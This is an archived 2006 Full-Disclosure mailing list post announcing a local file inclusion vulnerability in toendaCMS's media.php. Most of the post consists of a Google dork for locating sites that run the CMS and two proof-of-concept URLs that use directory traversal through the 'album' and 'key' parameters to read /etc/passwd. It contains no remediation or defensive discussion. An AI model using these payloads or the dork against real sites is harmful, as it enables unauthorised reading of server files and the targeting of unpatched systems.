[Full-disclosure] (no subject)

MoHaJaLi mohajali2k4 at gmail.com
Sat Sep 23 21:45:58 BST 2006

Previous message: [Full-disclosure] Cisco 7905 VoIP phone crashing from dsniff arpspoof?
Next message: [Full-disclosure] Local File Inclusion : Kietu
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Local File Include in  toendaCMS.

Vulnerable File : media.php

googleDork: "Powered by  toendaCMS "

PoC:
 

http://site.com/media.php?album=1005bb&key=../../../../../../../../../../../../../etc/passwd

 or 

http://site.com/ media.php?album=../../../../../../../../../../../../..&key=/etc/passwd

_____

Found By MoHaJaLi

Greetz to Eddy_BAck0o

_____

Previous message: [Full-disclosure] Cisco 7905 VoIP phone crashing from dsniff arpspoof?
Next message: [Full-disclosure] Local File Inclusion : Kietu
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Full-Disclosure is hosted and sponsored by Secunia.